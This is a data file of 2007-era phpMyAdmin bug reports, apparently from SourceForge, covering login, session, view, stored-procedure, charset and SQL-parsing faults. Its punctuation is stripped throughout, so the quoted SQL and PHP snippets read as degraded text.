"24444","8852","PMA behavior with session.auto start enabled.
I use PMA on several servers where I m constantly doing development, and I have been annoyed for some time at how PMA erases SESSION variables set by other apps on the webserver.
Why does PMA do this?
Is there a workaround or configuration change that would allow PMA to coexist with other apps that use the session variables.
FYI, session.auto start is enabled.
Original URL https sourceforge.net p phpmyadmin bugs 2488 https sourceforge.net p phpmyadmin bugs 2488 Original author courtarro Found in version 2.10.3","bug"
"24444","8853","Cant get phpmyadmin to load in Firefox.
I cant get the latest version to load in Firefox 2.0.0.5 or IE 7.
I just get a blank page.
even the source of the page is blank.
I have been running phpmyadmin for years and I tried upgrading to the latest version 2.11.0 and now nothing works.
Any help would be appreciated.
MySQL version 5.0.37 PHP 5.2.1 APACHE 2.0.59 I just dont know where to go from here.
Original URL https sourceforge.net p phpmyadmin bugs 2489 https sourceforge.net p phpmyadmin bugs 2489 Original author a2liter","bug"
"24444","8854","Suhosin cookie encryption breaks phpMyAdmin.
In openSUSE 10.2 when you install php suhosin, phpMyAdmin doesn t work.
Please, see https bugzilla.novell.com show bug.cgi?id=292262 GoAheadAndLogIn=1 I patched phpMyAdmin distributed with openSUSE 10.2, but I think, there are also people who install latest phpMyAdmin, downloaded from phpMyAdmin.net.
Please, could you apply submitted patch?
Thank you Original URL https sourceforge.net p phpmyadmin bugs 2490 https sourceforge.net p phpmyadmin bugs 2490 Original author anosek","bug"
"24444","8855","DROP Button does not work on defective VIEWs.
Have a look at the following 1) Create a table CREATE TABLE IF NOT EXISTS `test` `test1` varchar 1) collate latin1 german1 ci NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1 german1 ci; 2) Create a view for the table CREATE VIEW vtest AS SELECT test1 FROM test; 3) Rename table column ALTER TABLE `test` CHANGE `test1` `test2` VARCHAR 1 ) CHARACTER SET latin1 COLLATE latin1 german1 ci NOT NULL 4) Click the view vtest, obviously this can t work.
5) Now click the DROP Link on the very right of the top links.
The SQL executed is DROP TABLE `vtest` and not a DROP VIEW.
Configuration phpMyAdmin 2.10.3 PHP Version 5.2.2 MySQL client version 5.0.37 Used PHP extensions mysqli Server version 5.0.37 max log Original URL https sourceforge.net p phpmyadmin bugs 2491 https sourceforge.net p phpmyadmin bugs 2491 Original author blama Found in version 2.10.3","bug"
"24444","8856","Designer PDF Error when delete a table.
I m using the designer to create a pdf.
When you delete or rename an table, the pma relation, pma designer coords and pma table coords are not updating resulting a pdf error when you wanna display the pdf page.
Original URL https sourceforge.net p phpmyadmin bugs 2492 https sourceforge.net p phpmyadmin bugs 2492 Original author plom Found in version 2.10.3","bug"
"24444","8857","Php error with query without db selected.
Hi, this is really a non important bug, but still, it s a bug...
When you first log in phpmyadmin just before you select a database in the dropdown at the left...
If you click on the sql icon SQL to run a query and type in the popup a query like select version ) You ll receive a php error saying Fatal error Using this when not in object context in usr local www phpMyAdmin libraries Table.class.php on line 140 Have a nice day ;) Original URL https sourceforge.net p phpmyadmin bugs 2493 https sourceforge.net p phpmyadmin bugs 2493 Original author herrick","bug"
"24444","8858","Broken style in right frame on truncated SQL q..
When a lengthy SQL query e.g.
a SELECT containing lots of single fields from a wide table) is truncated in the pretty printer result, it can happen that the class of the last, truncated highlighted part of the SQL query extends to the rest of the page, messing the stylesheet for the layout limit form and the result table.
Example see attached screenshot from Opera 9.22 using the theme Original small at 80 size).
I assume the reason to be highlighted spans to be truncated and therefore not closed properly; if possible in any way, truncations should happen only between highlighting spans which makes this feature really non trivial) lt;span class= syntax quote syntax quote backtick gt;`tel pri[...] lt; div gt; Original URL https sourceforge.net p phpmyadmin bugs 2494 https sourceforge.net p phpmyadmin bugs 2494 Original author ligh1l Found in version 2.10.3","bug"
"24444","8859","CREATE VIEW from query results truncated.
It is actually in 2.11.0 RC1, the drop down list didn t have this version...
Anyway, when you create a view from a query result, which seems to be new functionality cheers for that!)
a text field is displayed with the SQL query to convert into a view.
Well, almost... being a input type text instead of a textarea it only contains the first line of the original query!!!
so if you have something like select from registrations INNER JOIN registration qualifications ON registration qualifications.registrations id = registrations.id ... the view will be created with SELECT FROM REGISTRATIONS ... Should be very easy to fix before 2.11 final actually, just use a textarea in there!!
Original URL https sourceforge.net p phpmyadmin bugs 2495 https sourceforge.net p phpmyadmin bugs 2495 Original author copong Found in version 2.11.0 rc1","bug"
"24444","8860","parameters lost when edit stored routine.
When editing a stored routine with 2.11 rc1 phpmyadmin skip paremetres.
This is reproducible like this create stored procedure in mysql client DELIMITER CREATE PROCEDURE p test IN aaaa VARCHAR 64), IN bbbb VARCHAR 15) ) BEGIN SELECT NOW ); END DELIMITER ; Now displaying it in phpmyadmin shows DROP PROCEDURE `p test` CREATE PROCEDURE `p test` ) BEGIN SELECT NOW ); END parameter aaaa and bbbb are not displayed.
When saving procedure parameters are lost Original URL https sourceforge.net p phpmyadmin bugs 2496 https sourceforge.net p phpmyadmin bugs 2496 Original author jean deram Found in version 2.11.0 rc1","bug"
"24444","8861","Duplicate entry error leads to another error.
If you make a table and trigger a duplicate entry error by inserting the same record twice, you get a message along the lines of duplicate entry for.. .
Below this error message is a button Browse .
If you hit this button Browse you trigger yet another error.
Here is an example SQL bit to trigger this enter it on the SQL tab of pma) create table test id INT auto increment, name VARCHAR 255) NOT NULL, primary key id) )type=InnoDB; CREATE UNIQUE INDEX name index ON test name); INSERT INTO test name) VALUES test ); INSERT INTO test name) VALUES test ); This gives the following result SQL query INSERT INTO test name ) VALUES test ); MySQL said Documentation 1062 Duplicate entry test for key 2 SQL query Documentation SELECT FROM Array WHERE CONCAT WS , name ) = test ORDER BY name LIMIT 0 , 30 MySQL said Documentation 1146 Table testdb.Array doesn t exist Note the FROM Array .
Also note that a simple query on a table with just a primary key and trying to manually insert a record will also trigger this problem.
As long as it generates a dupe record error, it will occur.
The problem for this is generated on line 562 in libraries common.lib.php in version 2.11rc0.
Tested with latest trunk, testing and 2.10.
The problem is due to PMA assuming backticks `) in the INSERT INTO statement.
A probably) false assumption.
If backticks are being used, this error is avoided.
Original URL https sourceforge.net p phpmyadmin bugs 2497 https sourceforge.net p phpmyadmin bugs 2497 Original author azurazu","bug"
"24444","8862","Lost password when searching.
Hello, hi have some problems with phpmyadmin on 2 hosts.
When I submit a search I get redirected to the login form with the following error 1045 Access denied for user www data localhost using password YES) So the password passed to mysqlis empty.
The script is tbl select.php.
The problem doesn t occur everytime.
I think it happens when the result set is empty.
Greetings Daniel Khan Original URL https sourceforge.net p phpmyadmin bugs 2498 https sourceforge.net p phpmyadmin bugs 2498 Original author datenpunk Found in version 2.9.1.1","bug"
"24444","8863","page select dropdown not updated.
after deleting some databases on from the server databases.php page the page select dropdown is not updated.
You can select an non existing page the last one if you happen to change the number of pages by that delete action) and get Warning array key exists ) [function.array key exists] The second argument should be either an array or an object in D \HTdocs\07PMA\PmaTrunkSVN\server databases.php on line 171 Original URL https sourceforge.net p phpmyadmin bugs 2499 https sourceforge.net p phpmyadmin bugs 2499 Original author windkiel Found in version Latest Git","bug"
"24444","8864","1193 Unknown system variable PROFILING .
Hi, I enabled profiling checkbox in SQL query window) and now every time I get the error 1193 Unknown system variable PROFILING when I want to execute a query.
5.1.20 beta community nt debug log Original URL https sourceforge.net p phpmyadmin bugs 2500 https sourceforge.net p phpmyadmin bugs 2500 Original author olafvdspek Found in version 2.11.0 rc1","bug"
"24444","8865","Edit PDF Pages Not Working.
The Edit PDF Pages button does not work with the 2.11.0 rc1 software.
When you click there it thinks about it awhile and takes you back to your home page.
You can easily see this on your demo servers.
As noted in the discussion forum I used your link to the latest stable version 2.10.3) and the Edit PDF Page link worked just fine.
When I used your link to the pma 2.11 3.0 = trunk version, it fails just like on my installations.
That is; when you click on it you go right back to your home page.
So perhaps there is something not completed in the new release that keeps it from working.
I don t know if others have not seen this yet or if this is something that is being worked on.
Let me know if know how to report this problem.
Thanks again, it looks like the problem is getting better located.
As noted in the thread, on my three installations all the tables are in place and are working fine with the previous release.
That being said you can easily see the problem on the demo sites.
Hope this helps, Bernie Original URL https sourceforge.net p phpmyadmin bugs 2501 https sourceforge.net p phpmyadmin bugs 2501 Original author bernard j l Found in version 2.11.0 rc1","bug"
"24444","8866","Old SVN URLs.
Hi, On the following page http www.phpmyadmin.net home page downloads.php the URL to the Web based Subversion repository viewer gives an error.
The correct URL is http phpmyadmin.svn.sourceforge.net viewvc phpmyadmin thanks, Thijs Original URL https sourceforge.net p phpmyadmin bugs 2502 https sourceforge.net p phpmyadmin bugs 2502 Original author kink","bug"
"24444","8867","browse foreigners encoding mixups.
Hi, I was looking through the browse foreigners.php file and am surprised by the encodings used for some strings.
I believe they may have mixed up htmlspecialchars ) and urlencode ).
I spotted the following cases Line 50 lt;input type= hidden name= pk value= lt;?php echo urlencode pk); ?
gt; gt; gt; Inside a HTML form field, htmlspecialchars ) should be the proper encoding.
Line 71 gotopage = PMA pageselector browse foreigners.php?field= .
urlencode field) .
amp;amp; .
PMA generate common url db, table) .
pk uri .
amp;amp;fieldkey= .
isset fieldkey) ?
fieldkey ) .
amp;amp;foreign filter= .
isset foreign filter) ?
htmlspecialchars foreign filter) ) .
amp;amp; , gt; field OK; fieldkey no encoding; foreign filter should use urlencode ).
Line 141 lt;input type= hidden name= field value= lt;?php echo urlencode field); ?
gt; gt; gt; urlencode in a form field again.
Line 142 lt;input type= hidden name= fieldkey value= lt;?php echo isset fieldkey) ?
fieldkey ; ?
gt; gt; gt; Fieldkey is not encoded.
However, a security fix was released earlier which adds a is numeric ) check just a couple of lines before CVE 2007 2245).
Is there a reason why only that occurrence was fixed and this one not?
Line 145 lt;input type= hidden name= pk value= lt;?php echo urlencode pk); ?
gt; gt; gt; urlencode again.
Note that a few lines below, htmlspecialchars is used correctly.
I m marking this as private, because from the code I cannot deduce why one occurence of fieldkey was fixed as a security issue, but another one not.
If there s a good reason for this, feel free to un private it.
Thanks, Thijs Original URL https sourceforge.net p phpmyadmin bugs 2503 https sourceforge.net p phpmyadmin bugs 2503 Original author kink Found in version 2.10.3","bug"
"24444","8868","False connection timeout.
I ve looked for a report about this bug but couldn t find one which fitted my case.
My database has 27 tables and I work in https.
When clicking on the last table name in the list on the left side, I m redirected on the page tbl structure.php asking me to connect again saying there was no activity since 7200 seconds my config), which is false.
If I then get back directly to the index page without connecting again, I m still connected and I can access to all other tables.
But any time I click on the last table name in the list on the left, I m asked to reconnect.
Here are some clues It doesn t happen if I don t force https use If I connect, then I can access to this last table.
But still, the bug goes on.
It occurs only on the last table name.
If I access the last table of the list by adding table=mytablename in the url, no problem If I click on the last table name in the db structure.php page main frame), no problem.
The same if open this page without the frameset Here is my configuration Gentoo Base System version 1.6.14 PHP Version 5.1.4 MySQL version 5.0.21 Generated configuration file Generated by phpMyAdmin 2.11.0 rc1 setup script by Michal xc4x8cihaxc5x99 lt;michal cihar.com gt; Version Id setup.php 10420 2007 06 03 23 30 40Z lem9 Date Sun, 12 Aug 2007 22 20 20 GMT Servers configuration i = 0; Server localhost cookie) [1] i ; cfg[ Servers ][ i][ bookmarktable ] = pma bookmark ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ designer coords ] = pma designer coords ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ connect type ] = socket ; cfg[ Servers ][ i][ compress ] = false; cfg[ Servers ][ i][ controluser ] = pma ; cfg[ Servers ][ i][ controlpass ] = ; cfg[ Servers ][ i][ auth type ] = cookie ; cfg[ Servers ][ i][ pmadb ] = information schema ; End of servers configuration cfg[ blowfish secret ] = ; cfg[ ForceSSL ] = true; cfg[ ShowPhpInfo ] = false; cfg[ ShowChgPassword ] = false; cfg[ AllowArbitraryServer ] = false; cfg[ LoginCookieRecall ] = something ; cfg[ LoginCookieValidity ] = 7200; ?
gt; Original URL https sourceforge.net p phpmyadmin bugs 2504 https sourceforge.net p phpmyadmin bugs 2504 Original author macricow Found in version 2.11.0 rc1","bug"
"24444","8869","Edit Procedure Request URI Too Large.
Try to edit a procedure with a lot of lines ) but ai recevied Request URI Too Large .
In URL is sent procedure body .
Can be send only procedure name and extract body of procedure from the server ?
Original URL https sourceforge.net p phpmyadmin bugs 2505 https sourceforge.net p phpmyadmin bugs 2505 Original author gabibraga Found in version 2.11.0 rc1","bug"
"24444","8870","Rename database loses charset information.
Hi!
When renaming a database in PMA, and that database has a different character set than default, this information is lost during the rename.
A copy works fine though.
Reproduce 1) Create a database, give it a charset something other than the server s default; 2) Copy the database.
See that the charset info is carried over.
3) Rename the database.
See that the charset is not included in the CREATE query and that the new database has the server s default charset.
I ve verified this in 2.9.1.1, 2.10.3 and the 3.x testsite.
Please let me know if you need more information.
Thijs Original URL https sourceforge.net p phpmyadmin bugs 2506 https sourceforge.net p phpmyadmin bugs 2506 Original author kink","bug"
"24444","8871","Browse after Unique check Constraint failure.
Hi, There is a bug with the query generated after a unique check constraint failure.
You do a select from DATABASENAME instead of select from TABLENAME which result in an error saying 1146 Table DATABASENAME.DATABASENAME doesn t exist How to reproduce 1 Create a table with a unique constraint 2 Add a row 3 Add a second row which will trigger the unique constraint 4 PMA Will say duplicate entry for 3 1 or whatever is the constraint and will prompt you to browse .
Click on browse You ll see the error about the table doesnt exist The error seems easy to fix at first sight, just use the table name instead of the database name in the FROM part Good luck Original URL https sourceforge.net p phpmyadmin bugs 2507 https sourceforge.net p phpmyadmin bugs 2507 Original author herrick","bug"
"24444","8872","cfg[ MaxExactCount ] truncated.
Look at the end of the message, problem might be solved already...
Anyway, as I have already written it If I have a view with more than 20.000 rows, the alert box says, that there are more than 20 rows.
The problem does not exist in the english language interface, but in all languages using a , as decimal point I checked german polish).
The difference can be seen from the following source code of the pages in english and german 8 lt; lt;div class= notice gt; This view has more than 20,000 rows.
Please refer to lt;a href= .
Documentation.html cfg MaxExactCount target= blank gt;documentation lt; a gt;.
lt; div gt; lt;fieldset gt; lt;legend gt;Query results operations lt; legend gt; lt;!
Print view gt; lt;div class= notice gt; Dieses View hat mehr als 20 Zeilen.
Bitte schlagen Sie im lt;a href= .
Documentation.html cfg MaxExactCount target= blank gt;Handbuch lt; a gt; nach.
lt; div gt; lt;fieldset gt; lt;legend gt;Operationen fxc3xbcr das Abfrageergebnis lt; legend gt; lt;!
Print view gt; 8 lt; This seems to be a misinterpretation of cfg[ MaxExactCount ].
Software Versions phpMyAdmin 2.9.1.1 Debian 3 mysql Ver 14.12 Distrib 5.0.32, for pc linux gnu i486) using readline 5.2 !
seems to be solved !
I just tried version phpMyAdmin 2.11.0 rc1 and the problem does not exist any more, since the message changed to gt; Showing rows 0 1 0 total, Query took 0.0013 sec) although this might not be the intended display...
Thanks for the great work!
Martin Weis Original URL https sourceforge.net p phpmyadmin bugs 2508 https sourceforge.net p phpmyadmin bugs 2508 Original author martin weis","bug"
"24444","8873","<br > blocks entry from being edited.
If you have a field with a lt;br gt; inside of it then phpMyAdmin is preventing it from posting the updated query to the database.
After trying to change a field and saving, there are no changes and no updated query.
Original URL https sourceforge.net p phpmyadmin bugs 2509 https sourceforge.net p phpmyadmin bugs 2509 Original author kirstpo Found in version 2.10.0.2","bug"
"24444","8874","Remove horizontal lines in navigation panel.
Hi, The database list in the left frame shouldn t be underlined IMO).
In the tables list, there s a horizontal line below the list that has no whitespace above it in Firefox.
I think that line and the other horizontal lines in that frame should just be removed.
Original URL https sourceforge.net p phpmyadmin bugs 2510 https sourceforge.net p phpmyadmin bugs 2510 Original author olafvdspek Found in version 2.11.0 rc1","bug"
"24444","8875","Missing Pages.
I have a database with more then 250 tables... On the left frame, the PAGES button to goto see any listings after the 250 is missing... 1 .. 250 318 ) but i can t see 251 318 from the left frame...
Original URL https sourceforge.net p phpmyadmin bugs 2512 https sourceforge.net p phpmyadmin bugs 2512 Original author nymphonics Found in version 2.11.0","bug"
"24444","8876","Table Print preview Missing column header.
Show a table structure with column comments available in MySQL 4.1 and 5.x).
Display the Print preview view The Comment column for the table structure has no header see attached image).
Reason There is one less header column TH) than content columns TD); or differently There is no header cell generated for the Comment column title, but content cells for the table column comments.
Original URL https sourceforge.net p phpmyadmin bugs 2511 https sourceforge.net p phpmyadmin bugs 2511 Original author ligh1l Found in version 2.11.0","bug"
"24444","8877","PHP MySQL version differs from MySQ server version.
Dear, I m new in using phpMyAdmin 2.11.0 and I m still getting the following error on main page Your PHP MySQL library version 5.0.45 differs from your MySQL server version 3.23.32.
This may cause unpredictable behavior.
I saw in ChangeLog, that in 2.11.0 phpMyAdmin also checks for differences between MySQL library and MySQL server.
Although my PHP MySQL library is really version 5.0.45, my MySQL server is 5.0.45 too.
I never used MySQL3.
Note When I installed the new version of phpMyAdmin, I only rebuilt phpmyadmin database database for pma controluser ), but everything seems to be built correctly I also checked the original manual on phpMyAdmin wiki.
I am running MySQL 5.0.45 and Apache 2.2.4 with PHP 5.2.3 without any Zend Optimizer ) installed on Windows XP.
Thanks for help, Lukxc3xa1xc5xa1 Chmela Original URL https sourceforge.net p phpmyadmin bugs 2513 https sourceforge.net p phpmyadmin bugs 2513 Original author kyselejsyrecek Found in version 2.11.0","bug"
"24444","8878","Logout causes CSS loss.
Hi, I m using the latest 2.11.0 release.
When logging out, I m sent to the login page as usual, but the login page lacks CSS formatting.
A reload solves it.
Steps to reproduce 1) Login to phpMyAdmin.
2) Press logout .
3) Get the login page but without CSS very wide Login box, for example) 4) Press browser reload.
5) Get the correct login page.
A guess is that this has something to do with the token passed to phpmyadmin.css.php.
Let me know if you need more information to debug this.
thanks!
Thijs phpMyAdmin 2.11.0 release PHP 5.2.3 Apache 2.2.4 Firefox 2.0.0.6 Original URL https sourceforge.net p phpmyadmin bugs 2514 https sourceforge.net p phpmyadmin bugs 2514 Original author kink Found in version 2.11.0","bug"
"24444","8879","Insert Update reports errors.
I do not understand this After Upgrade of phpmyadmin if i try to insert a record it shows a working query in the error message, but mysql speaks from a missing function?
From where comes this strange function ?
INSERT INTO `news test`.`test` `a` , `b` , `c` ) VALUES test 1 ), test 2 ), test 3 ) ) MySQL meldet Dokumentation 1305 FUNCTION news test.xc3x82 existiert nicht Original URL https sourceforge.net p phpmyadmin bugs 2515 https sourceforge.net p phpmyadmin bugs 2515 Original author reindl harald","bug"
"24444","8880","NO AUTO VALUE ON ZERO and MySQL version.
When exporting a table or database from a server with MySQL version 4.0.27 I get a file starting with the following content START phpMyAdmin SQL Dump version 2.11.0 http www.phpmyadmin.net Host Generation Time Aug 29, 2007 at 12 05 AM Server version 4.0.27 PHP Version 5.2.0 SET SQL MODE= NO AUTO VALUE ON ZERO ; STOP If I try to import this file on the same server I get the error 1193 Unknown system variable SQL MODE This is because the value NO AUTO VALUE ON ZERO was added in MySQL 4.1.1 http dev.mysql.com doc refman 4.1 en server sql mode.html) The code in libraries export sql.php doesn t check the MySQL server version START We want exported AUTO INCREMENT fields to have still same value, do this only for recent MySQL exports if !isset GLOBALS[ sql compatibility ]) || GLOBALS[ sql compatibility ] == NONE ) \{ head .= crlf .
SET SQL MODE= NO AUTO VALUE ON ZERO ; .
crlf; \} STOP Original URL https sourceforge.net p phpmyadmin bugs 2519 https sourceforge.net p phpmyadmin bugs 2519 Original author bjornth Found in version 2.11.0","bug"
"24444","8881","New table form does not overtake data.
Hi, since .11 phpMyAdmin doesn t overtake form data while I try to add an additional row to the form.
It s the Create table form.
Thanks for all!
Regards Tony Original URL https sourceforge.net p phpmyadmin bugs 2516 https sourceforge.net p phpmyadmin bugs 2516 Original author dragon fire Found in version 2.11.0","bug"
"24444","8882","No warning when db server not reachable.
hiho!
I had typed in a invalid db servername.
When I tried to login, I didn t get a errormessage.
In other versions of phpmyadmin was this function included.
greetz xc2xb5atthew Original URL https sourceforge.net p phpmyadmin bugs 2517 https sourceforge.net p phpmyadmin bugs 2517 Original author counterroot Found in version 2.11.0","bug"
"24444","8883","Subquery results without as are ignored.
The following is valid MySQL syntax SELECT FROM SELECT 1,2) t1 In 2.11.0, this produces no results not even a row count.
Oddly, the lefthand frame containing the list of database tables also refreshes.
The workaround is to change the query to SELECT FROM SELECT 1,2) AS t1 Note that the first method did work in 2.10.1, but has since been broken.
Original URL https sourceforge.net p phpmyadmin bugs 2518 https sourceforge.net p phpmyadmin bugs 2518 Original author gribnif Found in version 2.11.0","bug"
"24444","8884","Logout Message Denied Access.
When I logout from phpMyAdmin, it show the following message Incorrect username password.
Access denied .
It s a strange logout message.
This is the normal message that should be showed?
Original URL https sourceforge.net p phpmyadmin bugs 2520 https sourceforge.net p phpmyadmin bugs 2520 Original author geminisaga Found in version 2.11.0","bug"
"24444","8885","Create view algorithm.
Hi, Here is a simple bug I found which is not that important...
When you click on create view from browse the interface propose 3 values in the algorithm dropdown.
I can see UNDEFINED MERGE MERGE The html code is as follows lt;select name= algorithm id= algorithm gt; lt;option value= UNDEFINED gt;UNDEFINED lt; option gt; lt;option value= MERGE gt;MERGE lt; option gt; lt;option value= MERGE gt;MERGE lt; option gt; lt; select gt; it should be a quick fix Just replace one of the MERGE by TEMPTABLE Keep on the good work ) Original URL https sourceforge.net p phpmyadmin bugs 2521 https sourceforge.net p phpmyadmin bugs 2521 Original author herrick Found in version 2.11.0","bug"
"24444","8886","Re sorting data by column name in VIEW.
When attempting to re sort the data in a VIEW, by clicking on the column name header), the resulting SQL query uses the originating table.field name rather than view.field name in the ORDER clause.
Apparently, MySQL V 5.0.22 does not like this.
phpMyAdmin returns with, for example Error SQL query SELECT FROM `authsite` ORDER BY `CMVersion`.`versMajor` ASC LIMIT 0 , 30 MySQL said 1054 Unknown column CMVersion.versMajor in order clause where authsite is the VIEW, and CMVersion is a table used in the construction of the authsite view.
Original URL https sourceforge.net p phpmyadmin bugs 2522 https sourceforge.net p phpmyadmin bugs 2522 Original author kflat Found in version 2.11.0","bug"
"24444","8887","Passwords with characters.
When trying to login as a user with a password that contains characters, phpMyAdmin bugs a bit, resulting in a failed logon.
The MySQL command prompt confirms that the password containing the is indeed the correct password.
This has been tested on the 2.11.0 rc2 demo phpmyadmin.
The http method is reported to be unaffected.
I suspect this is an escaping problem, because of the special status of characters in URI s. Original URL https sourceforge.net p phpmyadmin bugs 2523 https sourceforge.net p phpmyadmin bugs 2523 Original author allardh Found in version 2.11.0","bug"
"24444","8888","Latest SVN gives an ugly error for PHP4 users.
Using the latest svn revision 10607); PHP 4 users get an ugly error message, Parse error syntax error, unexpected T STATIC, expecting T OLD FUNCTION or T FUNCTION or T VAR or \} in var www pma dev phpMyAdmin libraries Theme.class.php on line 113 Is it possible to at least display a nice message in the phpMyAdmin style) informing users of the need to have PHP5?
Original URL https sourceforge.net p phpmyadmin bugs 2524 https sourceforge.net p phpmyadmin bugs 2524 Original author ibennetch Found in version Latest Git","bug"
"24444","8889","phpMyAdmin tries to access non existing print.css.
using phpMyAdmin 2.11.0rc1 5 on openSUSE 10.3 beta2 The summary says it all phpMyAdmin tries to access non existing print.css on every browser request.
From error log File does not exist srv www htdocs phpMyAdmin print.css, referer http localhost phpMyAdmin How to reproduce open http localhost phpMyAdmin in any browser tested with Konqueror and IE) check the error log Note This happens at nearly?)
every page, not only at login.
Hint grep r print.css .
.
libraries header meta style.inc.php lt;link rel= stylesheet type= text css href= lt;?php echo defined PMA PATH TO BASEDIR ) ?
PMA PATH TO BASEDIR ; ?
gt;print.css media= print gt; .
themes original css theme print.css.php print css file from theme Original .
themes original css theme print.css.php version Id theme print.css.php 10145 2007 03 20 13 39 12Z cybot tm Original URL https sourceforge.net p phpmyadmin bugs 2525 https sourceforge.net p phpmyadmin bugs 2525 Original author christian boltz Found in version 2.11.0","bug"
"24444","8890","Notice Undefined variable cfg.
I just upgraded to phpMyAdmin 2.11.0.
When trying to execute e.g.
an INSERT and the current db user does not have permission to do this, a PHP error is triggered.
Here is the stack trace Notice Undefined variable cfg in var www adm pma libraries footer.inc.php 91 at require once ) in var www adm pma libraries common.lib.php 613 at PMA mysqlDie ) in var www adm pma sql.php 342 Original URL https sourceforge.net p phpmyadmin bugs 2527 https sourceforge.net p phpmyadmin bugs 2527 Original author c960657 Found in version 2.11.0","bug"
"24444","8891","No query shown for primary key creation.
phpMyAdmin 2.11.0 on PHP 5.2.4 as IIS ISAPI module) Server version 4.1.22 community nt Protocol version 10 Server localhost via TCP IP User root localhost MySQL charset UTF 8 Unicode utf8) MySQL connection collation utf8 unicode ci MySQL client version 5.0.45 Used PHP extensions mysqli The interface is inconsistent in showing queries when adding primary keys.
I m showing my table below.
CREATE TABLE IF NOT EXISTS `cache` `cache key` varchar 20) character set utf8 collate utf8 bin NOT NULL default , `cache index` int 10) unsigned NOT NULL default 0 , `cache data` longtext character set utf8 collate utf8 bin NOT NULL, `cache updated` timestamp NOT NULL default CURRENT TIMESTAMP on update CURRENT TIMESTAMP, PRIMARY KEY `cache key`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; I need to remove the primary key, either a dialog box pops up or it sends me to a confirmation page, so i can see the query.
Then, I need to add a primary key on cache key and cache index together; but the confirmation including the query) only shows up when you use the buttons next to the column name ie.
for one column of the table); if you use the buttons below the table structure for multiple selection) no query or confirmation is shown.
Original URL https sourceforge.net p phpmyadmin bugs 2528 https sourceforge.net p phpmyadmin bugs 2528 Original author npennema Found in version 2.11.0","bug"
"24444","8892","SHOW COLUMNS space problem.
Running SQL command SHOW COLUMNS FROM lt;table name gt; is OK But... Running SQL command SHOW COLUMNS FROM lt;table name gt; causes result, where you can edit or delete table columns as they were table items.
Before keyword SHOW must be one or more spaces.
Tested ON phpMyAdmin 2.11.0 all languages utf 8 only Original URL https sourceforge.net p phpmyadmin bugs 2526 https sourceforge.net p phpmyadmin bugs 2526 Original author petrzak Found in version Latest Git","bug"
"24444","8893","create table typo resulting in error.
it seems it misses a space when specifying the table default charset and the row format.
CREATE TABLE `youplaboum try1`.`activities` `activity id` int 11 ) NOT NULL AUTO INCREMENT , `nom` varchar 128 ) NOT NULL , PRIMARY KEY `activity id` ) , UNIQUE KEY `nom` `nom` ) ) ENGINE = MYISAM DEFAULT CHARSET = utf8ROW FORMAT = DYNAMIC COMMENT = Types d activitxc3xa9s offertes par Youplaboum AUTO INCREMENT =4 MySQL a rxc3xa9pondu Documentation 1115 Unknown character set utf8ROW FORMAT Original URL https sourceforge.net p phpmyadmin bugs 2529 https sourceforge.net p phpmyadmin bugs 2529 Original author pixeline Found in version 2.11.0","bug"
"24444","8894","PHP Version < 4.2.0 results in Fatal Error.
Hi, i m not sure if this is a Documentation Problem or not.
The Readme says Requirements php 4.1.0 or later but with php 4.1.x an Error is issued on the Startpage main.php) in [...]phpMyAdminMaster libraries ob.lib.php on line 116 [...] PHP Fatal error Unknown function ob flush ) which is only available in php gt;= 4.2.0 As i possible fix i replace ob flush ); with ob end flush ); ob start ); Thanks for your time and the good work.
Original URL https sourceforge.net p phpmyadmin bugs 2530 https sourceforge.net p phpmyadmin bugs 2530 Original author edorian Found in version 2.11.0","bug"
"24444","8895","ROW FORMAT incorrectly parsed.
Windows XP SP2 Apache 2.0.55 PHP 5.2.1 MySQL 5.0.41 community nt MySQL client 4.1.7 phpMyAdmin 2.11.0 When copying a database operations gt; Copy database to with structure data and create database before copying checked) the following error occured Error SQL query Edit CREATE TABLE `copy`.`images` `id` int 10 ) unsigned NOT NULL AUTO INCREMENT , `dataSmall` longblob NOT NULL , `dataMedium` longblob NOT NULL , `dataLarge` longblob NOT NULL , `dataXLarge` longblob NOT NULL , PRIMARY KEY `id` ) ) ENGINE = MYISAM DEFAULT CHARSET = utf8 COLLATE = utf8 unicode ciROW FORMAT = DYNAMIC MySQL said Documentation 1273 Unknown collation utf8 unicode ciROW FORMAT Original URL https sourceforge.net p phpmyadmin bugs 2531 https sourceforge.net p phpmyadmin bugs 2531 Original author jan1234 Found in version 2.11.0","bug"
"24444","8896","comma in enum components problems.
enum fields with comma ,) in their components are not treated correctly, mostly) when UTF8 encoding is used.
Example Enum value11,value12 , value21,value22 ) Version phpmyadmin 2.9.1.1 Debian4 debian stable) Version phpmyadmin 2.11.0 MySQLVersion 5.0.32 Debian 7etch1 debian stable) With collation set to latin1 swedish ci.
it replaces , with some special character, however with utf8 slovak ci it displays only part to the first comma.
i.e.
From the mentioned example only value11 and in table structure enum value11 .)
The problem continues when copy move rename database table operation is used.
Tables with such fields cannot be copied moved renamed as well as databases containing such tables.
Original URL https sourceforge.net p phpmyadmin bugs 2533 https sourceforge.net p phpmyadmin bugs 2533 Original author mhycko","bug"
"24444","8897","Left frame shows 404 error after clicking home.
After clicking the home icon above the database list in the left frame in phpMyAdmin 2.11.0 the content frame refreshes and the left frame shows a 404 error.
Original URL https sourceforge.net p phpmyadmin bugs 2532 https sourceforge.net p phpmyadmin bugs 2532 Original author themars Found in version 2.11.0","bug"
"24444","8898","phpMyAdmin 2.11.0 function in query returns 0 0 1 record)..
When I perform query 1 on our database the results i get is Showing rows 0 0 1 total, Query took 1.4988 sec), Yet below are all the rows that exist in the database.
But because of this when I press export, I only recieve 1 row in my export.
Altough when i modify the query a bit to remove the functions to actual dates of today.
See query 2) i get Showing rows 0 29 2,789 total, Query took 1.2995 sec) And below the same rows as in query 1.
Only this time the export works.
If I put them directly in the MySQL console prompt I get the same results for both queries and everything is fine.
=============================== QUERY 1 =============================== SELECT `enq client`.
